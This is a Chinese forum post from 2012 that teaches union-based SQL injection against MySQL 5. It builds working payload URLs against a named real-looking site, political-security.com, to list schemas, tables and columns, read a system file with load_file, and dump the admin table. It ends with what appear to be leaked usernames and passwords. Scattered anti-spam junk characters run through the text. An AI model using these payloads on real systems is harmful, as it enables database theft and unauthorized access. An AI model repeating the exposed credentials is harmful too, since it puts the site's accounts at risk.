此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似
; [7 i( h% R P3 j$ r但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人
[7 l; U& E- a
6 H- i: n" l, u1 W9 W3 I
+ X2 v! K; E( r8 c4 v5 s- K% ^优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入3 y+ `- t: p' ~3 }" w
# g2 X1 e2 l- s. D* ]( l缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...
. l# ]! H8 r8 [' N8 B; g X1 w; ~! a S1 X
下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示
8 e- N% |, j$ G; k# N9 a b+ t0 A在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等+ F1 N' H( q( Y" p( O! c! w
! M: n& A: {/ }5 L- |2 R/ khttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17
& x9 {/ R; v, M$ v" O. c, y. `; k3 W: w; x' `5 F
读出所有库:! J& @- A% q, [
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA
U' G1 C( U4 v+ |& n# h; ]$ ?( V& J/ l; s/ r& e6 D5 N
& L! P2 C9 f! E+ s; U+ M
" w4 \% C; d/ m/ h8 \8 B读出所有表:
% U$ P; _ _* y9 N& u! A% }6 e) Phttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()( L9 r. V; Z d- c5 Z, `
- o5 T/ W7 n: H
读出所有表字段:
0 l F) \( h& u/ ]. Zhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)
- v: p H, ]" ?0 U0 c/ S7 I3 j*/ (97,100,109,105,110)为admin的ascii码 依次类推
- }5 A( d ~: B: t2 t; z
+ }1 @5 _) X3 y7 H$ Z) K读出所有表字段里的内容: ^4 {( F+ h: j4 J
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin9 c2 |2 H2 ?6 m2 o
( g0 M' o- Z$ ?& u! f" t! Z- h$ T6 n7 I
# L" X( B8 R# Z+ y7 F4 l5 }
5 y1 S2 s* Q. Z0 g& U0 K4 {
& N C. Z9 l( ^# c4 J9 J0 s
% X+ c) n @& l" F* I& P; yhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23/ g1 Z! g: @6 }4 Y/ I
' ^4 p: l& V# m$ ?3 F5 m6 E1 J; x* q, S3 S$ Q3 @ P
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23
3 A: Y+ l, B2 v9 {9 z1 p; w$ ` F& j* M/ C! x; ~
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23
8 R6 Y, K3 I8 a) x
8 i1 I9 p$ L5 w% g! |8 S
) W2 [8 [' d8 |4 phttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%234 D$ T% L; I/ N! {/ J) Z
7 g1 q% J2 {1 F
! b7 y m9 w2 {3 N! d; n
webmaster:dzb521123,simlab:simadmin20043233
) l% [; _( \4 P8 ~ |
发表于 2012-9-13 16:37:34
收藏
支持
反对